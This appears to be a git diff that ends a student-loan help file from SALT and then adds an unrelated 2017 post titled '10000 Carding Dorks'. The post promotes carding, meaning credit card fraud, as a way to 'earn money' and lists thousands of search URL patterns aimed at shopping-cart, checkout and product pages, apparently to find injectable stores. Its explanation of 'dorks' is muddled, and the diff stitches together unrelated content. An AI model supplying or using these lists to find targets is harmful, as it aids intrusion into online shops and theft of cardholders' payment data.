+ Further Information On Federal Loan Discharge Programs
+ Further Information On Federal Loan Forgiveness Programs
+ Loan Cancellation And Discharge Forms
+ Further Information On Forgery (Contact your local police department and refer to you
+state’s laws.)
+
+About SALT
+SALT is a free, nonprofit-backed, educational resource that provides simple, smart,
+personalized ways to take control of your student debt and manage your finances. SALT was
+created by American Student Assistance® (ASA), a nonprofit organization with 50+ years of
+experience helping people make better decisions about financing their education and repaying
+student loans. Learn more at saltmoney.org.
diff --git a/10000 CARDING DORKS (1)_txt.md b/10000 CARDING DORKS (1)_txt.md
new file mode 100644
index 0000000..3b01213
--- /dev/null
+++ b/10000 CARDING DORKS (1)_txt.md
@@ -0,0 +1,5727 @@
+# 10000 CARDING DORKS (1)
+
+
+---
+
+Wednesday, February 1, 2017
+
+Hello today i am giving you latest carding dorks 2017 and 2018.By These you can Card any website and earn money.
+
+Carding is a term describing the trafficking of credit card, bank account and other personal information online as well as related fraud services.Carding activities also encompass procurement of details, and money laundering techniques. Modern carding sites have been described as full-service commercial entities.
+
+What Is Dorks?
+
+A Google dork is an employee who unknowingly exposes sensitive corporate information on the Internet. The word dork is slang for a slow-witted or in-ept person.
+
+Google dorks put corporate information at risk because they unwittingly create back doors that allow an attacker to enter a network without permission and/or gain access to unauthorized
+
+10000+ Latest Carding Dorks 2017 and 2018
+
+accinfo.php?cartId=
+acclogin.php?cartID=
+add.php?bookid=
+add_cart.php?num=
+addcart.php?
+addItem.php
+add-to-cart.php?ID=
+addToCart.php?idProduct=
+addtomylist.php?ProdId=
+adminEditProductFields.php?intProdID=
+advSearch_h.php?idCategory=
+affiliate.php?ID=
+affiliate-agreement.cfm?storeid=
+affiliates.php?id=
+ancillary.php?ID=
+
+archive.php?id=
+article.php?id=
+phpx?PageID
+basket.php?id=
+Book.php?bookID=
+book_list.php?bookid=
+book_view.php?bookid=
+BookDetails.php?ID=
+browse.php?catid=
+browse_item_details.php
+Browse_Item_Details.php?Store_Id=
+buy.php?
+buy.php?bookid=
+bycategory.php?id=
+cardinfo.php?card=
+cart.php?action=
+cart.php?cart_id=
+cart.php?id=
+cart_additem.php?id=
+cart_validate.php?id=
+cartadd.php?id=
+cat.php?iCat=
+catalog.php
+catalog.php?CatalogID=
+catalog_item.php?ID=
+catalog_main.php?catid=
+category.php
+category.php?catid=
+
+category_list.php?id=
+categorydisplay.php?catid=
+checkout.php?cartid=
+checkout.php?UserID=
+checkout_confirmed.php?order_id=
+checkout1.php?cartid=
+comersus_listCategoriesAndProducts.php?idCategory=
+comersus_optEmailToFriendForm.php?idProduct=
+comersus_optReviewReadExec.php?idProduct=
+comersus_viewItem.php?idProduct=
+comments_form.php?ID=
+contact.php?cartId=
+content.php?id=
+customerService.php?****ID1=
+default.php?catID=
+description.php?bookid=
+details.php?BookID=
+details.php?Press_Release_ID=
+details.php?Product_ID=
+details.php?Service_ID=
+display_item.php?id=
+displayproducts.php
+downloadTrial.php?intProdID=
+emailproduct.php?itemid=
+emailToFriend.php?idProduct=
+events.php?ID=
+faq.php?cartID=
+
+faq_list.php?id=
+faqs.php?id=
+feedback.php?title=
+freedownload.php?bookid=
+fullDisplay.php?item=
+getbook.php?bookid=
+GetItems.php?itemid=
+giftDetail.php?id=
+help.php?CartId=
+home.php?id=
+index.php?cart=
+index.php?cartID=
+index.php?ID=
+info.php?ID=
+item.php?eid=
+item.php?item_id=
+item.php?itemid=
+item.php?model=
+item.php?prodtype=
+item.php?shopcd=
+item_details.php?catid=
+item_list.php?maingroup
+
+item_show.php?code_no=
+itemDesc.php?CartId=
+itemdetail.php?item=
+itemdetails.php?catalogid=
+learnmore.php?cartID=
+links.php?catid=
+list.php?bookid=
+List.php?CatID=
+listcategoriesandproducts.php?idCategory=
+modline.php?id=
+myaccount.php?catid=
+news.php?id=
+order.php?BookID=
+order.php?id=
+order.php?item_ID=
+OrderForm.php?Cart=
+page.php?PartID=
+payment.php?CartID=
+pdetail.php?item_id=
+powersearch.php?CartId=
+price.php
+privacy.php?cartID=
+prodbycat.php?intCatalogID=
+prodetails.php?prodid=
+prodlist.php?catid=
+product.php?bookID=
+product.php?intProdID=
+product_info.php?item_id=
+productDetails.php?idProduct=
+productDisplay.php
+productinfo.php?item=
+productlist.php?ViewType=Category&CategoryID=
+productpage.php
+products.php?ID=
+products.php?keyword=
+products_category.php?CategoryID=
+products_detail.php?CategoryID=
+productsByCategory.php?intCatalogID=
+prodView.php?idProduct=
+promo.php?id=
+promotion.php?catid=
+pview.php?Item=
+resellers.php?idCategory=
+results.php?cat=
+savecart.php?CartId=
+search.php?CartID=
+searchcat.php?search_id=
+Select_Item.php?id=
+Services.php?ID=
+shippinginfo.php?CartId=
+shop.php?a=
+
+shop.php?action=
+shop.php?bookid=
+shop.php?cartID=
+shop_details.php?prodid=
+shopaddtocart.php
+shopaddtocart.php?catalogid=
+shopbasket.php?bookid=
+shopbycategory.php?catid=
+shopcart.php?title=
+shopcreatorder.php
+shopcurrency.php?cid=
+shopdc.php?bookid=
+shopdisplaycategories.php
+shopdisplayproduct.php?catalogid=
+shopdisplayproducts.php
+shopexd.php
+shopexd.php?catalogid=
+shopping_basket.php?cartID=
+shopprojectlogin.php
+shopquery.php?catalogid=
+shopremoveitem.php?cartid=
+shopreviewadd.php?id=
+shopreviewlist.php?id=
+ShopSearch.php?CategoryID=
+shoptellafriend.php?id=
+shopthanks.php
+shopwelcome.php?title=
+show_item.php?id=
+show_item_details.php?item_id=
+showbook.php?bookid=
+showStore.php?catID=
+shprodde.php?SKU=
+specials.php?id=
+store.php?id=
+store_bycat.php?id=
+store_listing.php?id=
+Store_ViewProducts.php?Cat=
+store-details.php?id=
+storefront.php?id=
+storefronts.php?title=
+storeitem.php?item=
+StoreRedirect.php?ID=
+subcategories.php?id=
+tek9.php?
+template.php?Action=Item&pid=
+topic.php?ID=
+tuangou.php?bookid=
+type.php?iType=
+updatebasket.php?bookid=
+
+updates.php?ID=
+view.php?cid=
+view_cart.php?title=
+view_detail.php?ID=
+viewcart.php?CartId=
+viewCart.php?userID=
+viewCat_h.php?idCategory=
+viewevent.php?EventID=
+viewitem.php?recor=
+viewPrd.php?idcategory=
+ViewProduct.php?misc=
+voteList.php?item_ID=
+whatsnew.php?idCategory=
+WsAncillary.php?ID=
+WsPages.php?ID=noticiasDetalle.php?xid=
+sitio/item.php?idcd=
+index.php?site=
+de/content.php?page_id=
+gallerysort.php?iid=
+products.php?type=
+event.php?id=
+showfeature.php?id=
+home.php?ID=
+tas/event.php?id=
+profile.php?id=
+details.php?id=
+past-event.php?id=
+index.php?action=
+site/products.php?prodid=
+page.php?pId=
+resources/vulnerabilities_list.php?id=
+site.php?id=
+products/index.php?rangeid=
+global_projects.php?cid=
+publications/view.php?id=
+display_page.php?id=
+pages.php?ID=
+lmsrecords_cd.php?cdid=
+product.php?prd=
+cat/?catid=
+products/product-list.php?id=
+debate-detail.php?id=
+cbmer/congres/page.php?LAN=
+content.php?id=
+news.php?ID=
+photogallery.php?id=
+index.php?id=
+product/product.php?product_no=
+nyheder.htm?show=
+book.php?ID=
+print.php?id=
+detail.php?id=
+book.php?id=
+content.php?PID=
+more_detail.php?id=
+content.php?id=
+view_items.php?id=
+view_author.php?id=
+main.php?id=
+english/fonction/print.php?id=
+magazines/adult_magazine_single_page.php?magid=
+product_details.php?prodid=
+magazines/adult_magazine_full_year.php?magid=
+products/card.php?prodID=
+catalog/product.php?cat_id=
+e_board/modifyform.html?code=
+community/calendar-event-fr.php?id=
+products.php?p=
+news.php?id=
+view/7/9628/1.html?reply=
+product_details.php?prodid=
+
+catalog/product.php?pid=
+rating.php?id=
+?page=
+catalog/main.php?cat_id=
+index.php?page=
+detail.php?prodid=
+products/product.php?pid=
+news.php?id=
+book_detail.php?BookID=
+catalog/main.php?cat_id=
+catalog/main.php?cat_id=
+default.php?cPath=
+catalog/main.php?cat_id=
+catalog/main.php?cat_id=
+category.php?catid=
+categories.php?cat=
+categories.php?cat=
+detail.php?prodID=
+detail.php?id=
+category.php?id=
+hm/inside.php?id=
+index.php?area_id=
+gallery.php?id=
+products.php?cat=
+products.php?cat=
+media/pr.php?id=
+books/book.php?proj_nr=
+products/card.php?prodID=
+general.php?id=
+news.php?t=
+usb/devices/showdev.php?id=
+content/detail.php?id=
+templet.php?acticle_id=
+news/news/title_show.php?id=
+product.php?id=
+index.php?url=
+cryolab/content.php?cid=
+ls.php?id=
+s.php?w=
+abroad/page.php?cid=
+bayer/dtnews.php?id=
+news/temp.php?id=
+index.php?url=
+book/bookcover.php?bookid=
+index.php/en/component/pvm/?view=
+product/list.php?pid=
+cats.php?cat=
+software_categories.php?cat_id=
+print.php?sid=
+docDetail.aspx?chnum=
+index.php?section=
+index.php?page=
+index.php?page=
+en/publications.php?id=
+events/detail.php?ID=
+forum/profile.php?id=
+media/pr.php?id=
+content.php?ID=
+cloudbank/detail.php?ID=
+pages.php?id=
+news.php?id=
+beitrag_D.php?id=
+content/index.php?id=
+index.php?i=
+?action=
+index.php?page=
+beitrag_F.php?id=
+index.php?pageid=
+page.php?modul=
+detail.php?id=
+index.php?w=
+index.php?modus=
+news.php?id=
+news.php?id=
+aktuelles/meldungen-detail.php?id=
+item.php?id=
+obio/detail.php?id=
+page/de/produkte/produkte.php?prodID=
+packages_display.php?ref=
+shop/index.php?cPath=
+modules.php?bookid=
+product-range.php?rangeID=
+en/news/fullnews.php?newsid=
+deal_coupon.php?cat_id=
+show.php?id=
+blog/index.php?idBlog=
+redaktion/whiteteeth/detail.php?nr=
+HistoryStore/pages/item.php?itemID=
+aktuelles/veranstaltungen/detail.php?id=
+tecdaten/showdetail.php?prodid=
+?id=
+rating/stat.php?id=
+content.php?id=
+viewapp.php?id=
+item.php?id=
+news/newsitem.php?newsID=
+FernandFaerie/index.php?c=
+show.php?id=
+?cat=
+categories.php?cat=
+category.php?c=
+product_info.php?id=
+prod.php?cat=
+store/product.php?productid=
+browsepr.php?pr=
+product-list.php?cid=
+products.php?cat_id=
+product.php?ItemID=
+category.php?c=
+main.php?id=
+article.php?id=
+showproduct.php?productId=
+view_item.php?item=
+skunkworks/content.php?id=
+index.php?id=
+item_show.php?id=
+publications.php?Id=
+
+index.php?t=
+view_items.php?id=
+portafolio/portafolio.php?id=
+YZboard/view.php?id=
+index_en.php?ref=
+index_en.php?ref=
+category.php?id_category=
+main.php?id=
+main.php?id=
+calendar/event.php?id=
+default.php?cPath=
+pages/print.php?id=
+index.php?pg_t=
+_news/news.php?id=
+forum/showProfile.php?id=
+fr/commande-liste-categorie.php?panier=
+downloads/shambler.php?id=
+sinformer/n/imprimer.php?id=
+More_Details.php?id=
+directory/contenu.php?id_cat=
+properties.php?id_cat=
+forum/showProfile.php?id=
+downloads/category.php?c=
+index.php?cat=
+product_info.php?products_id=
+product_info.php?products_id=
+product-list.php?category_id=
+detail.php?siteid=
+projects/event.php?id=
+view_items.php?id=
+more_details.php?id=
+melbourne_details.php?id=
+more_details.php?id=
+detail.php?id=
+more_details.php?id=
+home.php?cat=
+idlechat/message.php?id=
+detail.php?id=
+print.php?sid=
+more_details.php?id=
+default.php?cPath=
+events/event.php?id=
+brand.php?id=
+toynbeestudios/content.php?id=
+show-book.php?id=
+more_details.php?id=
+store/default.php?cPath=
+property.php?id=
+product_details.php?id=
+more_details.php?id=
+view-event.php?id=
+content.php?id=
+book.php?id=
+page/venue.php?id=
+print.php?sid=
+colourpointeducational/more_details.php?id=
+print.php?sid=
+browse/book.php?journalID=
+section.php?section=
+bookDetails.php?id=
+profiles/profile.php?profileid=
+event.php?id=
+gallery.php?id=
+category.php?CID=
+corporate/newsreleases_more.php?id=
+print.php?id=
+view_items.php?id=
+more_details.php?id=
+county-facts/diary/vcsgen.php?id=
+idlechat/message.php?id=
+podcast/item.php?pid=
+products.php?act=
+details.php?prodId=
+socsci/events/full_details.php?id=
+ourblog.php?categoryid=
+mall/more.php?ProdID=
+archive/get.php?message_id=
+review/review_form.php?item_id=
+english/publicproducts.php?groupid=
+news_and_notices.php?news_id=
+rounds-detail.php?id=
+gig.php?id=
+board/view.php?no=
+index.php?modus=
+news_item.php?id=
+rss.php?cat=
+products/product.php?id=
+details.php?ProdID=
+els_/product/product.php?id=
+store/description.php?iddesc=
+socsci/news_items/full_story.php?id=
+modules/forum/index.php?topic_id=
+feature.php?id=
+products/Blitzball.htm?id=
+profile_print.php?id=
+questions.php?questionid=
+html/scoutnew.php?prodid=
+main/index.php?action=
+********.php?cid=
+********.php?cid=
+news.php?type=
+index.php?page=
+viewthread.php?tid=
+summary.php?PID=
+news/latest_news.php?cat_id=
+index.php?cPath=
+category.php?CID=
+index.php?pid=
+more_details.php?id=
+specials.php?osCsid=
+search/display.php?BookID=
+articles.php?id=
+print.php?sid=
+page.php?id=
+more_details.php?id=
+newsite/pdf_show.php?id=
+shop/category.php?cat_id=
+shopcafe-shop-product.php?bookId=
+shop/books_detail.php?bookID=
+index.php?cPath=
+more_details.php?id=
+news.php?id=
+more_details.php?id=
+shop/books_detail.php?bookID=
+more_details.php?id=
+blog.php?blog=
+index.php?pid=
+prodotti.php?id_cat=
+category.php?CID=
+more_details.php?id=
+poem_list.php?bookID=
+more_details.php?id=
+content.php?categoryId=
+authorDetails.php?bookID=
+press_release.php?id=
+item_list.php?cat_id=
+colourpointeducational/more_details.php?id=
+index.php?pid=
+download.php?id=
+shop/category.php?cat_id=
+i-know/content.php?page=
+store/index.php?cat_id=
+yacht_search/yacht_view.php?pid=
+pharmaxim/category.php?cid=
+print.php?sid=
+specials.php?osCsid=
+store.php?cat_id=
+category.php?cid=
+displayrange.php?rangeid=
+product.php?id=
+csc/news-details.php?cat=
+products-display-details.php?prodid=
+stockists_list.php?area_id=
+news/newsitem.php?newsID=
+index.php?pid=
+newsitem.php?newsid=
+category.php?id=
+news/newsitem.php?newsID=
+details.php?prodId=
+publications/publication.php?id=
+purelydiamond/products/category.php?cat=
+category.php?cid=
+product/detail.php?id=
+news/newsitem.php?newsID=
+details.php?prodID=
+item.php?item_id=
+edition.php?area_id=
+page.php?area_id=
+view_newsletter.php?id=
+library.php?cat=
+categories.php?cat=
+page.php?area_id=
+categories.php?cat=
+publications.php?id=
+item.php?sub_id=
+page.php?area_id=
+page.php?area_id=
+category.php?catid=
+
+content.php?cID=
+newsitem.php?newsid=
+frontend/category.php?id_category=
+news/newsitem.php?newsID=
+things-to-do/detail.php?id=
+page.php?area_id=
+page.php?area_id=
+listing.php?cat=
+item.php?iid=
+customer/home.php?cat=
+staff/publications.php?sn=
+news/newsitem.php?newsID=
+library.php?cat=
+main/index.php?uid=
+library.php?cat=
+shop/eventshop/product_detail.php?itemid=
+news/newsitem.php?newsID=
+news/newsitem.php?newsID=
+library.php?cat=
+FullStory.php?Id=
+publications.php?ID=
+publications/book_reviews/full_review.php?id=
+newsitem.php?newsID=
+newsItem.php?newsId=
+site/en/list_service.php?cat=
+page.php?area_id=
+product.php?ProductID=
+releases_headlines_details.php?id=
+product.php?shopprodid=
+product.php?productid=
+product.php?product=
+product.php?product_id=
+productlist.php?id=
+product.php?shopprodid=
+garden_equipment/pest-weed-control/product.php?pr=
+product.php?shopprodid=
+browsepr.php?pr=
+productlist.php?id=
+kshop/product.php?productid=
+product.php?pid=
+showproduct.php?prodid=
+product.php?productid=
+productlist.php?id=
+index.php?pageId=
+productlist.php?tid=
+product-list.php?id=
+onlinesales/product.php?product_id=
+garden_equipment/Fruit-Cage/product.php?pr=
+product.php?shopprodid=
+product_info.php?products_id=
+productlist.php?tid=
+showsub.php?id=
+productlist.php?fid=
+products.php?cat=
+products.php?cat=
+product-list.php?id=
+product.php?sku=
+store/product.php?productid=
+products.php?cat=
+productList.php?cat=
+product_detail.php?product_id=
+product.php?pid=
+wiki/pmwiki.php?page****=
+summary.php?PID=
+productlist.php?grpid=
+cart/product.php?productid=
+db/CART/product_details.php?product_id=
+ProductList.php?id=
+products/product.php?id=
+product.php?shopprodid=
+product_info.php?products_id=
+product_ranges_view.php?ID=
+cei/cedb/projdetail.php?projID=
+products.php?DepartmentID=
+product.php?shopprodid=
+product.php?shopprodid=
+product_info.php?products_id=
+index.php?news=
+education/content.php?page=
+Interior/productlist.php?id=
+products.php?categoryID=
+modules.php?****=
+message/comment_threads.php?postID=
+artist_art.php?id=
+products.php?cat=
+index.php?option=
+ov_tv.php?item=
+index.php?lang=
+showproduct.php?cat=
+index.php?lang=
+product.php?bid=
+product.php?bid=
+cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
+item_show.php?lid=
+?pagerequested=
+downloads.php?id=
+print.php?sid=
+print.php?sid=
+product.php?intProductID=
+productList.php?id=
+product.php?intProductID=
+more_details.php?id=
+more_details.php?id=
+books.php?id=
+index.php?offs=
+mboard/replies.php?parent_id=
+Computer Science.php?id=
+news.php?id=
+pdf_post.php?ID=
+reviews.php?id=
+art.php?id=
+prod.php?cat=
+event_info.php?p=
+view_items.php?id=
+home.php?cat=
+item_book.php?CAT=
+www/index.php?page=
+schule/termine.php?view=
+goods_detail.php?data=
+storemanager/contents/item.php?page_code=
+view_items.php?id=
+customer/board.htm?mode=
+help/com_view.html?code=
+n_replyboard.php?typeboard=
+eng_board/view.php?T****=
+prev_results.php?prodID=
+bbs/view.php?no=
+gnu/?doc=
+zb/view.php?uid=
+global/product/product.php?gubun=
+m_view.php?ps_db=
+naboard/memo.php?bd=
+bookmark/mybook/bookmark.php?bookPageNo=
+board/board.html?table=
+kboard/kboard.php?board=
+order.asp?lotid=
+english/board/view****.php?code=
+goboard/front/board_view.php?code=
+bbs/bbsView.php?id=
+boardView.php?bbs=
+eng/rgboard/view.php?&bbs_id=
+product/product.php?cate=
+content.php?p=
+page.php?module=
+?pid=
+bookpage.php?id=
+view_items.php?id=
+index.php?pagina=
+product.php?prodid=
+notify/notify_form.php?topic_id=
+php/index.php?id=
+content.php?cid=
+product.php?product_id=
+constructies/product.php?id=
+detail.php?id=
+php/index.php?id=
+index.php?section=
+product.php?****=
+show_bug.cgi?id=
+detail.php?id=
+bookpage.php?id=
+product.php?id=
+today.php?eventid=
+main.php?item=
+index.php?cPath=
+news.php?id=
+event.php?id=
+print.php?sid=
+news/news.php?id=
+module/range/dutch_windmill_collection.php?rangeId=
+print.php?sid=
+
+show_bug.cgi?id=
+product_details.php?product_id=
+products.php?groupid=
+projdetails.php?id=
+product.php?productid=
+products.php?catid=
+product.php?product_id=
+product.php?prodid=
+product.php?prodid=
+newsitem.php?newsID=
+newsitem.php?newsid=
+profile.php?id=
+********s_in_area.php?area_id=
+productlist.php?id=
+productsview.php?proid=
+rss.php?cat=
+pub/pds/pds_view.php?start=
+products.php?rub=
+ogloszenia/rss.php?cat=
+print.php?sid=
+product.php?id=
+print.php?sid=
+magazin.php?cid=
+galerie.php?cid=
+www/index.php?page=
+view.php?id=
+content.php?id=
+board/read.php?tid=
+product.php?id_h=
+news.php?id=
+index.php?book=
+products.php?act=
+reply.php?id=
+stat.php?id=
+products.php?cat_id=
+free_board/board_view.html?page=
+item.php?id=
+view_items.php?id=
+main.php?prodID=
+gb/comment.php?gb_id=
+gb/comment.php?gb_id=
+classifieds/showproduct.php?product=
+view.php?pageNum_rscomp=
+cart/addToCart.php?cid=
+content/pages/index.php?id_cat=
+content.php?id=
+display.php?ID=
+display.php?ID=
+ponuky/item_show.php?ID=
+default.php?cPath=
+main/magpreview.php?id=
+***zine/board.php?board=
+content.php?arti_id=
+mall/more.php?ProdID=
+product.php?cat=
+news.php?id=
+content/view.php?id=
+content.php?id=
+index.php?action=
+board_view.php?s_board_id=
+KM/BOARD/readboard.php?id=
+board_view.html?id=
+content.php?cont_title=
+category.php?catid=
+mall/more.php?ProdID=
+publications.php?id=
+irbeautina/product_detail.php?product_id=
+print.php?sid=
+index_en.php?id=
+bid/topic.php?TopicID=
+news_content.php?CategoryID=
+front/bin/forumview.phtml?bbcode=
+cat.php?cat_id=
+stat.php?id=
+veranstaltungen/detail.php?id=
+more_details.php?id=
+english/print.php?id=
+print.php?id=
+view_item.php?id=
+content/conference_register.php?ID=
+rss/event.php?id=
+event.php?id=
+main.php?id=
+rtfe.php?siteid=
+category.php?cid=
+classifieds/detail.php?siteid=
+tools/print.php?id=
+channel/channel-layout.php?objId=
+content.php?id=
+resources/detail.php?id=
+more_details.php?id=
+detail.php?id=
+view_items.php?id=
+content/programme.php?ID=
+book.php?id=
+php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s=
+detail.php?id=
+default.php?cPath=
+more_details.php?id=
+php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s=
+content.php?id=
+view_items.php?id=
+default.php?cPath=
+book.php?id=
+view_items.php?id=
+products/parts/detail.php?id=
+category.php?cid=
+book.html?isbn=
+view_item.php?id=
+picgallery/category.php?cid=
+detail.php?id=
+print.php?sid=
+displayArticleB.php?id=
+knowledge_base/detail.php?id=
+bpac/calendar/event.php?id=
+mb_showtopic.php?topic_id=
+pages.php?id=
+
+content.php?id=
+exhibition_overview.php?id=
+singer/detail.php?siteid=
+Category.php?cid=
+detail.php?id=
+print.php?sid=
+category.php?cid=
+more_detail.php?X_EID=
+book.php?ISBN=
+view_items.php?id=
+category.php?cid=
+htmlpage.php?id=
+story.php?id=
+tools/print.php?id=
+print.php?sid=
+php/event.php?id=
+print.php?sid=
+articlecategory.php?id=
+print.php?sid=
+ibp.php?ISBN=
+club.php?cid=
+view_items.php?id=
+aboutchiangmai/details.php?id=
+view_items.php?id=
+book.php?isbn=
+blog_detail.php?id=
+event.php?id=
+default.php?cPath=
+product_info.php?products_id=
+shop_display_products.php?cat_id=
+print.php?sid=
+modules/content/index.php?id=
+printcards.php?ID=
+events/event.php?ID=
+more_details.php?id=
+default.php?TID=
+general.php?id=
+detail.php?id=
+event.php?id=
+referral/detail.php?siteid=
+view_items.php?id=
+event.php?id=
+view_items.php?id=
+category.php?id=
+cemetery.php?id=
+index.php?cid=
+content.php?id=
+exhibitions/detail.php?id=
+bookview.php?id=
+edatabase/home.php?cat=
+view_items.php?id=
+store/view_items.php?id=
+print.php?sid=
+events/event_detail.php?id=
+view_items.php?id=
+detail.php?id=
+pages/video.php?id=
+about_us.php?id=
+recipe/category.php?cid=
+view_item.php?id=
+en/main.php?id=
+print.php?sid=
+More_Details.php?id=
+category.php?cid=
+home.php?cat=
+article.php?id=
+page.php?id=
+print-story.php?id=
+psychology/people/detail.php?id=
+print.php?sid=
+print.php?ID=
+article_preview.php?id=
+Pages/whichArticle.php?id=
+view_items.php?id=
+Sales/view_item.php?id=
+book.php?isbn=
+knowledge_base/detail.php?id=
+gallery/gallery.php?id=
+event.php?id=
+detail.php?id=
+store/home.php?cat=
+view_items.php?id=
+detail.php?ID=
+event_details.php?id=
+detailedbook.php?isbn=
+fatcat/home.php?view=
+events/index.php?id=
+static.php?id=
+answer/default.php?pollID=
+news/detail.php?id=
+view_items.php?id=
+events/unique_event.php?ID=
+gallery/detail.php?ID=
+print.php?sid=
+view_items.php?id=
+board/showthread.php?t=
+book.php?id=
+event.php?id=
+more_detail.php?id=
+knowledge_base/detail.php?id=
+html/print.php?sid=
+index.php?id=
+content.php?ID=
+Shop/home.php?cat=
+store/home.php?cat=
+print.php?sid=
+gallery.php?id=
+resources/index.php?cat=
+events/event.php?id=
+view_items.php?id=
+default.php?cPath=
+content.php?id=
+products/products.php?p=
+auction/item.php?id=
+products.php?cat=
+clan_page.php?cid=
+product.php?sku=
+item.php?id=
+events?id=
+comments.php?id=
+products/?catID=
+modules.php?****=
+fshstatistic/index.php?PID=
+products/products.php?p=
+sport.php?revista=
+products.php?p=
+products.php?openparent=
+home.php?cat=
+news/shownewsarticle.php?articleid=
+discussions/10/9/?CategoryID=
+trailer.php?id=
+news.php?id=
+?page=
+index.php?page=
+item/detail.php?num=
+features/view.php?id=
+site/?details&prodid=
+product_info.php?products_id=
+remixer.php?id=
+proddetails_print.php?prodid=
+pylones/item.php?item=
+index.php?cont=
+product.php?ItemId=
+video.php?id=
+detail.php?item_id=
+filemanager.php?delete=
+news/newsletter.php?id=
+shop/home.php?cat=
+designcenter/item.php?id=
+board/kboard.php?board=
+index.php?id=
+board/view_temp.php?table=
+magazine-details.php?magid=
+thread.php/id=
+index.php?y=
+products.php?sub=
+products.html?file=
+xcart/home.php?cat=
+event.php?contentID=
+forum/showthread.php?p=
+model.php?item=
+product_details.php?prodid=
+kboard/kboard.php?board=
+english/index.php?id=
+products.php?req=
+search.php?q=
+products.php?openparent=
+product.php?id=
+content.php?op=
+event_listings_short.php?s=
+stat.php?id=
+print.php?id=
+tutorial.php?articleid=
+product.php?product=
+content/view.php?id=
+phorum/read.php?3,716,721,quote=
+php/fidEAD6DDC6CC9D1ADDFD7876B7715A3342E18A865C.aspx?s=
+suffering/newssummpopup.php?newscode=
+
+kr/product/product.php?gubun=
+content.php?nID=
+search***.php?ki=
+nightlife/martini.php?cid=
+detail.php?id=
+discussions/9/6/?CategoryID=
+seWork.aspx?WORKID=
+modules.php?****=
+products.php?cat=
+products.php?p=
+cheats/item.php?itemid=
+index.php?main=
+modules/xfmod/forum/forum.php?thread_id=
+downloads.php?type=
+club.php?cid=
+content.php?id=
+forums/search.php?do=
+mlx/slip_about_sharebacks.php?item=
+category.php?categoryid=
+nasar/news.php?id=
+news.php?id=
+show.php?item=
+rmcs/opencomic.phtml?rowid=
+products.php?cid=
+index.php?url=
+showmedia.php?id=
+lit_work.php?w_id=
+site_list.php?sort=
+home.php?cat=
+joblog/index.php?mode=
+eng/board/view.php?id=
+item.php?id=
+index.php?m=
+detail.php?id=
+goods_detail.php?goodsIdx=
+index.php?str=
+episode.php?id=
+link.php?type=
+resources/detail.php?id=
+display-product.php?Product=
+main/viewItem.php?itemid=
+item.php?iid=
+index.php?list=
+products.php?p=
+subcat.php?catID=
+htm/item_cat.php?item_id=
+addcolumn.php?id=
+cats.php?cat=
+cats.php?cat=
+?page=
+modules/content/index.php?id=
+detail.php?cat_id=
+site/?details&prodid=
+product.php?lang=
+modules/wfdownloads/singlefile.php?cid=
+details.php?prodid=
+myResources_noBanner.php?categoryID=
+product.php?id=
+ppads/external.php?type=
+store/product.php?productid=
+detail.php?id=
+prod_details.php?products_id=
+board/templete/sycho/input.php?table=
+cats.php?cat=
+product/product.php?product_no=
+search.php?q=
+record_profile.php?id=
+index.php?y=
+view.php?v_id=
+awards/index.php?input1=
+jobsite_storage_equipment/view_products.php?p_id=
+rural/rss.php?cat=
+calendar.php?event_id=
+eshop.php?id=
+content.php?ID=
+addimage.php?cid=
+category.php?cid=
+artist_info.php?artistId=
+forum/viewtopic.php?TopicID=
+browse.php?cid=
+editProduct.php?cid=
+main/index.php?uid=
+tutorials/view.php?id=
+products.php?p=
+index.php?size=
+pylones/item.php?item=
+categories.php?start=
+portfolio.html?categoryid=
+forums/showthread.php?t=
+item.php?code=
+products.php?cat=
+TopResources.php?CategoryID=
+opinion.php?option=
+modify_en.htm?mode=
+events/detail.php?id=
+cart/prod_details.php?prodid=
+html/home/products/product.php?pid=
+product.php?product_no=
+auction/item.php?id=
+cms/showpage.php?cid=
+touchy/home.php?cat=
+products.php?sku=
+fcms/view.php?cid=
+newsletter/newsletter.php?letter=
+campkc-view-event.php?Item_ID=
+forums/index.php?page=
+products.php?session=
+view_event.php?eid=
+product.php?pcid=
+db/item.html?item=
+item.php?item_id=
+order-now.php?prodid=
+product.php?id=
+store_prod_details.php?ProdID=
+products.php?sku=
+news.php?item=
+news.php?id=
+cart/prod_details.php?prodid=
+products/products.php?p=
+category.php?cid=
+specials.php?osCsid=
+infusions/book_panel/books.php?bookid=
+special_offers/more_details.php?id=
+book.php?id=
+journal.php?id=
+category.php?cid=
+News/press_release.php?id=
+pages/index.php?pID=
+exclusive.php?pID=
+shop/pages.php?page=
+index.php?cPath=
+shop/index.php?cat_id=
+artistdetail.php?ID=
+products_connections_detail.php?cat_id=
+php/fid27BF3BCB1A648805B511298CE6D643E72B4D59AD.aspx?s=
+reviews/more_details.php?id=
+press_release.php?id=
+product.php?rangeid=
+knowledgebase/article.php?id=
+store/index.php?cat_id=
+news.php?cat_id=
+Products/products.php?showonly=
+eng/store/show_scat.php?cat_id=
+search/index.php?q=
+news/press_release.php?id=
+html/print.php?sid=
+aggregator.php?id=
+news/shownews.php?article=
+default.php?cPath=
+press_release.php?id=
+book.php?bookid=
+cubecart/index.php?cat_id=
+classified/detail.php?siteid=
+cart/item_show.php?itemID=
+theater-show.php?id=
+cube/index.php?cat_id=
+preorder.php?bookID=
+category.php?cid=
+category.php?cat_id=
+eventsdetail.php?pid=
+forum/index.php?topic=
+print.php?sid=
+article.php?id=
+html/products.php?id=
+print.php?sid=
+read.php?in=
+index.php?cat_id=
+top/store.php?cat_id=
+hearst_journalism/press_release.php?id=
+press_release.php?id=
+shop/category.php?cat_id=
+projectdisplay.php?pid=
+FREE/poll.php?pid=
+onlineshop/productView.php?rangeId=
+more_details.php?id=
+********.php?pid=
+catalog/index.php?cPath=
+
+page.php?id=
+index.php?cPath=
+article_full.php?id=
+hearst_journalism/press_release.php?id=
+dump.php?bd_id=
+Category.php?cid=
+products.php?cat=
+store/products.php?cat_id=
+product.php?cat_id=
+v/showthread.php?t=
+melbourne_details.php?id=
+stdetail.php?prodID=
+**********/fid17013034EFB2509745A39CD861F4FEA3E716FBE5.aspx?s=
+print.php?sid=
+press_release/release_detail.php?id=
+shop/shop.php?id=
+news/v.php?id=
+education.php?id_cat=
+store/store.php?cat_id=
+forums/showthread.php?t=
+news.php?id=
+events/event-detail.cfm?intNewsEventsID=
+article.php?id=
+viewmedia.php?prmMID=
+magdetail.php?magid=
+cemetery.php?id=
+index.php?id_cat=
+shop/index.php?cPath=
+view_songs.php?cat_id=
+shop/products.php?p=
